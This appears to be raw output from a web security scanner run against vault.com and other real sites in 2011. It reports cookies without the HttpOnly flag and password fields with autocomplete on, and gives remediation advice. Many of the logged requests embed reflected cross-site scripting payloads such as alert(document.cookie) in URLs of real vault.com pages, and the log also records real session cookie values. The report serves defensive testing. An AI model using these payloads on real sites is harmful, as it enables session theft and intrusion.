GET /images/vault_logo_new.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/Tools.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery-1.3.2.min.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.DOMWindow.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.autocomplete.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.carousel.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
/** * * * Carousel object * Carousel.left = initial LEFT css property of the sliding container. * Carousel.links = array of carousel carousel items * Carousel.numImages = number of items that ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.popupWindow.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.stylish-select.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.swapimage.min.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/main.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/membership.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/swfobject.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
/** * SWFObject v1.5.1: Flash Player detection and embed - http://blog.deconcept.com/swfobject/ * * SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License: * http://www.open ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/time-tracker.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
// Copyright 2007 Google, Inc. // This sample code is under the Apache2 license, see // http://www.apache.org/licenses/LICENSE-2.0 for license details. /** * @fileoverview Wrapper for Time Tracki ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/vault_header.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/buttons.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/home.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/jquery.autocomplete.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/law-rankings.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/login.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/main.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/membership.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/polls.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /styles/print.css HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.weil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Washington-DC/Attorneys HTTP/1.1 Host: www.yellowpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 19 Jan 2011 15:13:37 GMT Status: 301 Moved Permanently Server: nginx Content-Type: text/plain Location: http://www.yellowpages.com/washington-dc/attorneys Content-Length: 9 X-Urid: d-9ca453f0-060c-012e-b0d1-001e0be96752 Expires: Wed, 19 Jan 2011 15:13:36 GMT Cache-Control: no-cache Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The page contains a form with the following action URL:
http://dcregistry.com/cgi-bin/wbn/wbn_admin.pl
The form contains the following password field with autocomplete enabled:
password
Request
GET /wbn/welcome.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:20:53 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 49869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The page contains a form with the following action URL:
http://dcregistry.com/cgi-bin/wbn2/wbn_admin.pl
The form contains the following password field with autocomplete enabled:
password
Request
GET /wbn/welcome.html HTTP/1.1 Host: dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:20:53 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 49869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The form contains the following password field with autocomplete enabled:
password
Request
GET /TrkrSSL.html HTTP/1.1 Host: immigration.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Thu, 02 Dec 2010 22:02:23 GMT Accept-Ranges: bytes ETag: "fe5bfa986c92cb1:0" Server: Microsoft-IIS/7.5 Date: Wed, 19 Jan 2011 18:10:05 GMT Connection: close Content-Length: 2619
The page contains a form with the following action URL:
https://login.yahoo.com/config/login?
The form contains the following password field with autocomplete enabled:
passwd
Request
GET /config/login HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:20 GMT Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 41558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]... </legend>
The form contains the following password field with autocomplete enabled:
password
Request
GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1 Host: money.cnn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:25:12 GMT Server: Apache Accept-Ranges: bytes Cache-Control: max-age=60, private Expires: Wed, 19 Jan 2011 15:26:12 GMT Content-Type: text/html Vary: Accept-Encoding,User-Agent Connection: close Content-Length: 75163
